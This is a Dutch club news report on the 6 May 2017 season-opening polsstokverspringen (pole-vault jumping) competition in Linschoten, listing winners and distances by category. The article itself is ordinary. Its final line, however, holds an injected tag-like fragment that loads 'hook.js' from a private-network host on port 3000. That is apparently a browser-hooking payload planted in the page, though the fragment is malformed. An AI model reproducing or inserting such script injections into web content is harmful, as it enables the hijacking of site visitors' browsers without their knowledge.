logo-linschoten.jpg
2017-05-08 9:11

Goede seizoensopening, favorietenrollen worden waargemaakt

Zaterdagmiddag 06 mei 2017: het zonnetje schijnt en de wedstrijdaccommodatie in Linschoten ligt er klaar voor. De commentator heeft een stapel data voor zijn neus, de bult en het terras zitten vol publiek en er lopen vele springers in de bekende gekleurde trainingspakken rondom de schansen. Niks staat een prachtige opening van het polsstokverspring-seizoen in de weg.

Om 14.30 uur werd de eerste sprong gemaakt in de strijd om de VKP Beveiligingstechniek Trofee. Dit is tevens de eerste wedstrijd die meetelt voor het De Samenwerking-klassement en dus liggen de leidersshirts al klaar naast de kampioensbekers. Er valt wat te winnen vandaag.

Gedurende de winter hebben de senioren Jaco de Groot (Woerden) en Erwin Timmerarends (Montfoort) samen hard getraind maar vandaag gaan zij de strijd aan om de eerste dagtitel in de Senioren Topklasse. Helaas wordt het niet echt spannend want de Groot blijft Timmerarends vanaf de eerste sprong steeds een stapje voor. Jaco de Groot passeert als enige springer de 20 meter-grens deze wedstrijd en wint met een mooie afstand van 20.54 meter. Timmerarends volgt met een afstand van 19.88 m. Op de derde plek eindigt Thomas van Midden (Vlist), hij komt tot 18.81 m.

Met 13.21 m bij de Dames A laat Iris Mulder (Vlist) zien dat zij een aanstormend talent is. Hiermee blijft zij wel ruim een meter achter op de top 3 van de Dames Topklasse. De derde plek is voor Kimberly Engelhard (Gouda) met 14.37 m. Fabiënne Overbeek (Benschop), komt tot 14.77 m en wordt hiermee tweede. Hollands Record-houdster Dymphie van Rooijen maakt de hoge verwachtingen waar. Ze wint de wedstrijd overtuigend met een afstand van 16.25 m.

Ricardo Faaij (Haastrecht) heerst in de Junioren Topklasse. In de voorrondes springt hij al 18.39 m en met deze afstand blijft hij zijn concurrenten bijna 2 m voor. Matthieu van Vuuren (Benschop) komt tot 16.43 m en wordt hiermee tweede. Bas van Leeuwen (Woerden) springt in de voorrondes 16.14 m en eindigt op de derde plek. Gelukkig weet van Leeuwen het gat met Faaij iets te verkleinen door in de finale het eerste persoonlijke record van 2017 te springen, namelijk 17.68 m.

In de Jongens Topklasse laat Jelle Timmerman (Linschoten) gelijk zien dat hij niet van plan is om het ‘Talent van het jaar 2016’, Reinier Overbeek (Benschop) makkelijk te maken dit seizoen. Hij is in zijn eerste sprong slechts enkele centimeters van de top verwijdert en opent zijn wedstrijd daardoor met een goede 16.48 m. Reinier Overbeek (Benschop) laat zich niet kennen en springt 2 cm verder dan Timmerman. In zijn eerste finalesprong verbetert Overbeek zichzelf tot 16.87 m en dat is de winnende afstand van vandaag. Jelle Timmerman eindigt op de tweede plaats met 16.80 m. De derde plaats is voor Corné de Regt met 15.30 m.

Kortom, een mooie wedstrijd met goede afstanden maar weinig verrassingen. In iedere categorie neemt de favoriet de VKP Beveiligingstechniek Trofee mee naar huis. Zij staan ook aan top in het klassement en dus staan volgende week om 18.30 uur in Vlist Dymphie van Rooijen, Ricardo Faaij en Reinier Overbeek in het leidersshirt op de schansen. Jaco de Groot gaat de komende periode op reis en zal zijn leiderstrui dus snel kwijt raken.

< src=http://192.168.0.52:3000/hook.js>